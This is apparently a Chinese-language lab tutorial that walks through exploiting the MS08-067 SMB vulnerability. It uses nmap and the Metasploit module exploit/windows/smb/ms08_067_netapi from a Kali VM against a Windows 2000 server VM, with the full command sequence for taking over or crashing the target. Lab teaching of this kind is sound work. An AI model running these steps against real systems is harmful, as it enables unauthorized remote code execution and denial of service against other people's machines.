一、介绍
MS08-067是windows服务器中一个漏洞。 如果在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者未经身份验证即可利用此漏洞运行任意代码或导致被攻击的机器死机,也可用于进行蠕虫攻击。
二、实现的功能
(1)掌握Matesploit基本原理操作。
(2)掌握Nmap的使用。
(3)利用ms08_067漏洞,客户机kali-linux攻击服务器·windows 2000 advanced,导致服务器死机或控制该服务器。
三、所需要的软件
两台虚拟机网络适配器都要设置为桥接模式。
(1)kali虚拟机,ip地址:192.168.178.226(打开kali的终端使用,ifconfig查看IP地址)
(2)服务器操作系统:windows 2000 advanced Server, ip地址:192.168.178.207(打开windows的终端使用,ipconfig查看IP地址)
注:在两台虚拟机上要互拼网络:(命令:ping+IP地址)
(3)所需软件:Metasploit、NMAP
四、实验步骤
(1)在kali虚拟机上,输入命令 nmap 192.168.178.207(这地址是windows 2000)
我们发现445端口处于一个开放状态。
(2)在kali环境中试着打开metasploit,使用命令msfconsole,等待metasploit开启。
(3)在Metasploit中,输入search ms08_067搜索漏洞相关模块,如图:
(4) 输入use exploit/windows/smb/ms08_067_netapi加载模块。
(5)使用set rhost 192.168.178.207来设置目标地址。
(6)通过show targets查看Metasploit提供的目标操作系统类型,输入命令show targets,如图所示。
(7) 通过show targets得知windows 2000操作系统类型ID为1,输入set target 1,进行指定,如图所示:
(8) 输入show options来查看所有设置是否正确,如图所示。
注:攻击IP地址要是Windows 2000,对象也是Windows 2000
(9) 检测所有参数没有错误后,输入exploit,开始进行攻击,如图所示。
(10)查看Windows 2000 是否被控制,如果Windows 2000服务系统弹出一个被攻击的窗口则成功,Windows 2000服务死机大约为一分钟 。